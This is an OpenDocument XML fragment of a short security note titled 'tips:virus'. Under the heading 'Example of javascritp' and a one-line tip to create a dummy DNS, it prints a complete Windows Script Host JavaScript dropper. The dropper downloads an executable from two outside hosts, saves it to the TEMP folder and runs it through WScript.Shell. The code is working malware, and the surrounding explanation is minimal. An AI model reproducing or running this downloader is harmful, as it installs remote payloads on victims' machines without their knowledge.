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virus"/><text:bookmark-start text:name="__RefHeading___example_of_javascritp_1"/><text:bookmark-start text:name="example_of_javascritp"/>Example of javascritp<text:bookmark-end text:name="__RefHeading___example_of_javascritp_1"/><text:bookmark-end text:name="example_of_javascritp"/></text:h>
      <text:p text:style-name="Text_20_body">To avoid this type of attack create a dummy DNS for URLS</text:p>
      <text:p text:style-name="Preformatted_20_Text">var STATUS_OK = 200;<text:line-break/>var METHOD_GET = "GET";<text:line-break/>var METHOD_EXEC = "Exec";<text:line-break/>var W_SCRIPT_SHELL = "WScript.Shell";<text:line-break/>var MSXML2_XMLHTTP = "MSXML2.XMLHTTP";<text:line-break/>var ADODB = "ADODB";<text:line-break/>var STREAM = "Stream";<text:line-break/>var TEMP_ENV = "%TEMP%\\";<text:line-break/>var EXE_EXTENSION = ".exe";<text:line-break/>var MIN_FILE_SIZE = 20000;<text:line-break/><text:line-break/>var URLS = ["http://skuawill.com/93.exe","http://skuawillbil.com/93.exe"];<text:line-break/>var FILE_NAME = 35184372088832;<text:line-break/><text:line-break/><text:line-break/>var wShell = WScript.CreateObject(W_SCRIPT_SHELL);<text:line-break/>var httpRequest = WScript.CreateObject(MSXML2_XMLHTTP);<text:line-break/>var stream = WScript.CreateObject(ADODB+"."+STREAM);<text:line-break/><text:line-break/>var tmpDir = wShell.ExpandEnvironmentStrings(TEMP_ENV);<text:line-break/>var storedFilePathName = tmpDir + FILE_NAME + EXE_EXTENSION;<text:line-break/><text:line-break/><text:line-break/>for (var v = 0; v &lt; URLS.length; v++) {<text:line-break/><text:s text:c="4"/>try {<text:line-break/><text:s text:c="8"/>var url = URLS[v];<text:line-break/><text:s text:c="8"/>httpRequest.open(METHOD_GET, url, false);<text:line-break/><text:s text:c="8"/>httpRequest.send();<text:line-break/><text:s text:c="8"/>if (httpRequest.status == STATUS_OK) {<text:line-break/><text:s text:c="12"/>try {<text:line-break/><text:s text:c="16"/>stream.open();<text:line-break/><text:s text:c="16"/>stream.type = 1;<text:line-break/><text:s text:c="16"/>stream.write(httpRequest.responseBody);<text:line-break/><text:s text:c="16"/>if (stream.size &gt; MIN_FILE_SIZE) {<text:line-break/><text:s text:c="20"/>v = URLS.length;<text:line-break/><text:s text:c="20"/>stream.position = 0;<text:line-break/><text:s text:c="20"/>stream.saveToFile(storedFilePathName, 2);<text:line-break/><text:s text:c="16"/>}<text:line-break/><text:s text:c="12"/>} finally {<text:line-break/><text:s text:c="16"/>stream.close();<text:line-break/><text:s text:c="12"/>}<text:line-break/><text:s text:c="8"/>}<text:line-break/><text:s text:c="4"/>}<text:line-break/><text:s text:c="4"/>catch (ignored) {<text:line-break/><text:s text:c="4"/>}<text:line-break/>}<text:line-break/>wShell[METHOD_EXEC](tmpDir + Math.pow(2, 45))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07::47:23</meta:creation-date>
    <dc:creator>Generated</dc:creator>
    <dc:date>2025-12-15T07::47:23</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>tips:virus</dc:title>
  </office:meta>
</office:document-meta>
</file>